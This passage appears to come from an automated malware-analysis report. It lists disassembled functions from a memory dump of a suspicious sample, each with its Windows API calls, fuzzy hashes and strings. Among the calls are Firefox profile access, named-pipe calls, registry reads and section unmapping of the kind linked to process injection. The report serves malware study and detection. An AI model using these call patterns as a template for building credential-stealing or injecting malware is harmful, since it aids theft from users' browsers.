APIs
  • InterlockedIncrement.KERNEL32(001EAF5C), ref: 001C1F73
  • lstrcpy.KERNEL32(00000000), ref: 001C1FA8
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
    • Part of subcall function 001DD17E: memset.NTDLL ref: 001DD192
  • HeapFree.KERNEL32(00000000,?), ref: 001C2050
    • Part of subcall function 001DD36B: memset.NTDLL ref: 001DD3C6
    • Part of subcall function 001DD36B: SetLastError.KERNEL32(00000000,?,?,?), ref: 001DD41A
    • Part of subcall function 001DD36B: WaitForSingleObject.KERNEL32(?,?), ref: 001DD599
    • Part of subcall function 001DD36B: Sleep.KERNEL32(?,?,?,00000001,?,?,00000000,0000000C,0000000F,?,00000000,00000000,?,?,?,?), ref: 001DD5AA
  • GetLastError.KERNEL32(00000000), ref: 001C2039
  • InterlockedDecrement.KERNEL32(001EAF5C), ref: 001C2067
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C2098
    • Part of subcall function 001C771B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
    • Part of subcall function 001C771B: lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
    • Part of subcall function 001C771B: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
    • Part of subcall function 001C771B: mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
    • Part of subcall function 001C771B: CloseHandle.KERNEL32(?), ref: 001C77C0
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • DeleteFileA.KERNEL32(00000000), ref: 001C2088
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C5816, Relevance: 10.6, APIs: 7, Instructions: 109 Total matches: 43stringsleepmemory
Similarity
  • Total matches: 43
  • API ID: HeapFreeRtlEnterCriticalSectionRtlLeaveCriticalSectionSleeplstrcpylstrlenmemcpy
  • String ID:
  • API String ID: 2790639078-0
  • Opcode ID: 1766a587401683fdb30044bc6672b38e50223d8055563f5057ad240d85219721
  • Instruction ID: f742db94e7bccdeb672c9316879cf6e869411e6e683690c3bbd30f2f23ea435e
  • Opcode Fuzzy Hash: 5301CB70045D41C7DA7730898822B75C948FF5A3F1C0D6F71ED127468A6F83719AEA4E
  • Instruction Fuzzy Hash: f742db94e7bccdeb672c9316879cf6e869411e6e683690c3bbd30f2f23ea435e
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • lstrlen.KERNEL32(00000008,?,?,?,001C402D,00000000,00000000), ref: 001C5876
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C5898
  • memcpy.NTDLL(00000000,00000000,00000000,?,?,?,001C402D,00000000,00000000), ref: 001C58AA
  • lstrcpy.KERNEL32(00000020,00000008), ref: 001C58DC
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C58E8
  • Sleep.KERNEL32(0000000A), ref: 001C58F2
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5940
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C70F5, Relevance: 10.6, APIs: 7, Instructions: 91 Total matches: 60memorystringsynchronization
Similarity
  • Total matches: 60
  • API ID: lstrlen$GetDriveTypeHeapFreeRtlAllocateHeapWaitForSingleObjectmemset
  • String ID:
  • API String ID: 3218151923-0
  • Opcode ID: 974418b0150871375a409eae20db66cf184f8890a346e9cc83530061c0aa9893
  • Instruction ID: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
  • Opcode Fuzzy Hash: 97F02461CA2887A7900B446974553AEDA116F416C9D4C0B62ED412814EAF0732E6EB4A
  • Instruction Fuzzy Hash: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C713F
  • memset.NTDLL ref: 001C715C
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C7178
  • GetDriveTypeW.KERNEL32(?), ref: 001C7186
  • lstrlenW.KERNEL32(?), ref: 001C7192
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • lstrlenW.KERNEL32(?), ref: 001C71BF
  • HeapFree.KERNEL32(00000000,?), ref: 001C71D8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D6DF6, Relevance: 10.6, APIs: 7, Instructions: 90 Total matches: 57filesynchronization
Similarity
  • Total matches: 57
  • API ID: GetLastError$CloseHandleSetEndOfFileSetFilePointerWaitForSingleObjectWriteFile
  • String ID:
  • API String ID: 1310882240-0
  • Opcode ID: 428b72d32063ac54d5b905598191ac261dcad3cf285b84f146690d990cf327a1
  • Instruction ID: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
  • Opcode Fuzzy Hash: CAF02BA0515DC14BC217346516727BFD904EB425C5E4C7372A840420494F06769BAB5A
  • Instruction Fuzzy Hash: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
APIs
  • GetLastError.KERNEL32 ref: 001D6E41
  • WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
  • SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
  • WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
  • SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
  • GetLastError.KERNEL32 ref: 001D6EDD
  • CloseHandle.KERNEL32(00000006), ref: 001D6EE9
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CBD48, Relevance: 10.6, APIs: 7, Instructions: 89 Total matches: 58memorystringpipe
Similarity
  • Total matches: 58
  • API ID: memcpy$CallNamedPipeGetLastErrorHeapFreeRtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 1038157847-0
  • Opcode ID: 6bb6ae630451ca86ee9df0719d803bcc4810f9cd3f6b8a390704e6ae44b564aa
  • Instruction ID: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
  • Opcode Fuzzy Hash: 73F05990085A81D2C123B42951217FFF194BEC02DBCDEA772E8E21885E2E0162A06B5D
  • Instruction Fuzzy Hash: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
APIs
  • lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
  • memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
  • memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
  • CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
  • GetLastError.KERNEL32 ref: 001CBE07
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C79A7, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 87 Total matches: 56memoryfilestring
Similarity
  • Total matches: 56
  • API ID: HeapFree$DeleteFileStrTrimlstrlen
  • String ID: ss: *.*.*.*
  • API String ID: 1870149019-856079725
  • Opcode ID: 59ebdf1013b10810b54038a6e3da88a7dec1c4f015ef1646412946d67e45a806
  • Instruction ID: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
  • Opcode Fuzzy Hash: ECF09E21084D41AF8937286A50607F50915FB804F1C4DCFB7AC857B2857F836228BB4B
  • Instruction Fuzzy Hash: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • lstrlen.KERNEL32(00000000,?,00000F00), ref: 001C79CB
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • StrTrimA.SHLWAPI(00000000,001E53D4), ref: 001C7A55
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7A72
  • DeleteFileA.KERNEL32(00000000,00000000,?,?,001ECE60,00000000,?,00000F00), ref: 001C7A7A
  • HeapFree.KERNEL32(00000000,00000000,001ECE60), ref: 001C7A89
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7D61, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 75 Total matches: 58memory
Similarity
  • Total matches: 58
  • API ID: memcpy$RtlAllocateHeap
  • String ID: [URL]$https://
  • API String ID: 3738462082-2839221783
  • Opcode ID: afc151603a67bdcf01d5cf8a846d0f5f8a912d4aa94ead1b687b7b5f553c7413
  • Instruction ID: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
  • Opcode Fuzzy Hash: 21E02B245D1F02D6D85A20845438BB7C6873D42394CAE7766C950255772A25B174B588
  • Instruction Fuzzy Hash: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
APIs
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
  • memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
  • memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
  • memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C771B, Relevance: 10.6, APIs: 7, Instructions: 71 Total matches: 62memoryfilestring
Similarity
  • Total matches: 62
  • API ID: HeapFree$CloseHandleCreateFileRtlAllocateHeaplstrlenmbstowcs
  • String ID:
  • API String ID: 1841334458-0
  • Opcode ID: 88abf7bf9e6c094b0eee3fb77fa4d18763972b4349be3218ed9dbfc152fe13ca
  • Instruction ID: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
  • Opcode Fuzzy Hash: 2BE02B71181D5096C02719A68C58339E6056F422E4E5D4627FA013910FB24317E8EBAB
  • Instruction Fuzzy Hash: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C7527: LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 001C75DB
    • Part of subcall function 001C7527: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 001C75FC
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
  • lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
  • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
  • mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C7B90: GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
    • Part of subcall function 001C7B90: memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
    • Part of subcall function 001C7B90: RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
    • Part of subcall function 001C7B90: lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7B90: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
  • CloseHandle.KERNEL32(?), ref: 001C77C0
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2416, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 50memorystringthread
Similarity
  • Total matches: 50
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFreeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 1766977795-0
  • Opcode ID: b41ce86395a358d9a6be2e887350fb16e7ee7d04885f28ea6336c7c9663497fb
  • Instruction ID: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
  • Opcode Fuzzy Hash: A8E026A5068C0583807778228061BAF9B82BAC10D8C8D7123FE402614B2F037487DF2B
  • Instruction Fuzzy Hash: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
APIs
  • lstrlen.KERNEL32(?,00000000,00000000,00000001,?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C242D
  • RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 001C2440
  • lstrcpy.KERNEL32(00000008,?), ref: 001C2462
  • CreateThread.KERNEL32(00000000,00000000,001C23CD,00000000,00000000,00000000), ref: 001C247A
  • CloseHandle.KERNEL32(00000000), ref: 001C2485
  • GetLastError.KERNEL32(?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000), ref: 001C248D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C249E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C5C23, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59 Total matches: 27stringtime
Similarity
  • Total matches: 27
  • API ID: lstrcmpi$GetSystemTimeAsFileTimeRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID: Main
  • API String ID: 3521027233-521822810
  • Opcode ID: bc401ce39ed135578d671bff3c7e0c2395a673578b9a283240c4e40e0584cd5d
  • Instruction ID: 21906b460c7dcbc5898723b16b272b466b629f8a7c325451b17217bd0ccc14f7
  • Opcode Fuzzy Hash: 10E02B34084403D7901B60A90C06F18DE4EF3603C8CCE2A65C41129A061B56326E2F3B
  • Instruction Fuzzy Hash: 21906b460c7dcbc5898723b16b272b466b629f8a7c325451b17217bd0ccc14f7
APIs
  • lstrcmpi.KERNEL32(00000000,Main), ref: 001C5C44
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5C56
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5C69
  • lstrcmpi.KERNEL32(001EB260,00000000), ref: 001C5C8A
  • GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,?,001C9732,00000000), ref: 001C5C9E
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4EEE, Relevance: 9.2, APIs: 6, Instructions: 187 Total matches: 61memorystringthread
Similarity
  • Total matches: 61
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeaplstrcmplstrlenwsprintf
  • String ID:
  • API String ID: 236900386-0
  • Opcode ID: 0432ee343612a59173c04e27a8b524be30c23a17c6314db2962a76565d5ddb3c
  • Instruction ID: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
  • Opcode Fuzzy Hash: F7119B31058EC2A7441760C18092BBED450FC920E580D37F2EEB86A2CE6F43258B2B1B
  • Instruction Fuzzy Hash: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
APIs
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C46AF
    • Part of subcall function 001C45F0: WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C473C
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
    • Part of subcall function 001C45F0: RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
    • Part of subcall function 001D829C: lstrlen.KERNEL32(?,00000000,001EABBC,?,001C194F,?), ref: 001D82A6
    • Part of subcall function 001D829C: StrRChrA.SHLWAPI(?,00000000,0000002E), ref: 001D82D1
    • Part of subcall function 001D829C: lstrcat.KERNEL32(00000000,?), ref: 001D8317
  • lstrcmp.KERNEL32(?,?), ref: 001C4F65
  • GetCurrentThreadId.KERNEL32(?,?,00000000,?,Function_00003E59,?,00000001), ref: 001C5037
  • GetCurrentThread.KERNEL32 ref: 001C5048
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001C1916: RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C192A
    • Part of subcall function 001C1916: RegCloseKey.ADVAPI32(?), ref: 001C1958
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C50A6
  • wsprintfA.USER32 ref: 001C50B7
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C50C2
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C8CA3, Relevance: 9.1, APIs: 6, Instructions: 72 Total matches: 58memorystring
Similarity
  • Total matches: 58
  • API ID: HeapFreelstrlen$mbstowcswcstombs
  • String ID:
  • API String ID: 2099024402-0
  • Opcode ID: e75e910ff2ec0d94baf6de8394c43fdc3fb5dca6cdb9e0b5bf2cf534734101ee
  • Instruction ID: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
  • Opcode Fuzzy Hash: 88E02BB20C04C297060710B3847577DDA09BCC21D100E53ABDB08EC34DA68723A5BB6F
  • Instruction Fuzzy Hash: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
APIs
  • lstrlenW.KERNEL32(?), ref: 001C8CC7
  • wcstombs.NTDLL ref: 001C8CE7
    • Part of subcall function 001C8B4E: RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,?,?), ref: 001C8C27
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
  • lstrlen.KERNEL32(00000000), ref: 001C8D0B
  • mbstowcs.NTDLL ref: 001C8D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D3F
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D59
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DD36B, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 207 Total matches: 57sleepsynchronization
Similarity
  • Total matches: 57
  • API ID: SetLastErrorSleepWaitForSingleObjectmemset
  • String ID: vids
  • API String ID: 1012678829-3767230166
  • Opcode ID: a88323ab6a07f6567de602f156fbacf356d172862014bdadb632bb7e4ac17ede
  • Instruction ID: 7794b0509761be8d864e16b56acb391e5ba30bd334e757b795fdcad4b1508c3e
  • Opcode Fuzzy Hash: E1216B4906CCE1E3D8E268440463F6D32146F83DFAD4DA72667BE9A6D75F012306D629
  • Instruction Fuzzy Hash: 7794b0509761be8d864e16b56acb391e5ba30bd334e757b795fdcad4b1508c3e
APIs
  • memset.NTDLL ref: 001DD3C6
  • SetLastError.KERNEL32(00000000,?,?,?), ref: 001DD41A
    • Part of subcall function 001DD348: GetSystemTimeAsFileTime.KERNEL32(00000001,?,?,?,001DD513,?,00000000,00000000,?,?,?,?,00000000,?,?,?), ref: 001DD351
    • Part of subcall function 001DD348: _aulldiv.NTDLL(00000001,?,00002710,00000000), ref: 001DD364
  • WaitForSingleObject.KERNEL32(?,?), ref: 001DD599
  • Sleep.KERNEL32(?,?,?,00000001,?,?,00000000,0000000C,0000000F,?,00000000,00000000,?,?,?,?), ref: 001DD5AA
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C6C08, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 141 Total matches: 19registrysynchronization
Similarity
  • Total matches: 19
  • API ID: RegCloseKeyRegOpenKeySetEventWaitForSingleObject
  • String ID: %APPDATA%\Mozilla\Firefox\Profiles
  • API String ID: 2346524515-3215297822
  • Opcode ID: 04e48ca811839595ab19984103b0a713a9098f9930145295782b9b8a8acae543
  • Instruction ID: effeb2e01b4a51d3d610c8b01d7388b0104aa6fb8cbfa1868068c1e0be09bfdc
  • Opcode Fuzzy Hash: 64110C72556761C8C9256C84281E37A35C3FA833D3D2C7703EDA071A8B4B8261ECBD98
  • Instruction Fuzzy Hash: effeb2e01b4a51d3d610c8b01d7388b0104aa6fb8cbfa1868068c1e0be09bfdc
APIs
    • Part of subcall function 001D83A0: GetProcAddress.KERNEL32(001ED992,001C6C3C,00000000), ref: 001D83B4
    • Part of subcall function 001D9E63: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001D9E93
    • Part of subcall function 001C3996: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C39AA
    • Part of subcall function 001C3996: CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C3A90
    • Part of subcall function 001C3996: GetLastError.KERNEL32 ref: 001C3A9B
    • Part of subcall function 001C3996: HeapFree.KERNEL32(00000000,00000000), ref: 001C3AB0
    • Part of subcall function 001C3996: RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 001C3AC1
  • SetEvent.KERNEL32(00000001,001EB1D0,?,00000000), ref: 001C6C91
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • WaitForSingleObject.KERNEL32(00000000,%APPDATA%\Mozilla\Firefox\Profiles), ref: 001C6D1E
  • RegOpenKeyA.ADVAPI32(80000001,001EC992,?), ref: 001C6D4F
  • RegCloseKey.ADVAPI32(?), ref: 001C6D77
    • Part of subcall function 001CB2DA: HeapFree.KERNEL32(00000000,001CD6FE,00000000), ref: 001CB341
    • Part of subcall function 001D9029: NtQuerySystemInformation.NTDLL(00000005,00000000,00010000,00010000), ref: 001D905A
    • Part of subcall function 001D9029: RtlNtStatusToDosError.NTDLL(C000009A), ref: 001D9095
    • Part of subcall function 001D6D18: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D6D36
    • Part of subcall function 001D6D18: GetFileSize.KERNEL32(00000000,00000000,?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000), ref: 001D6D46
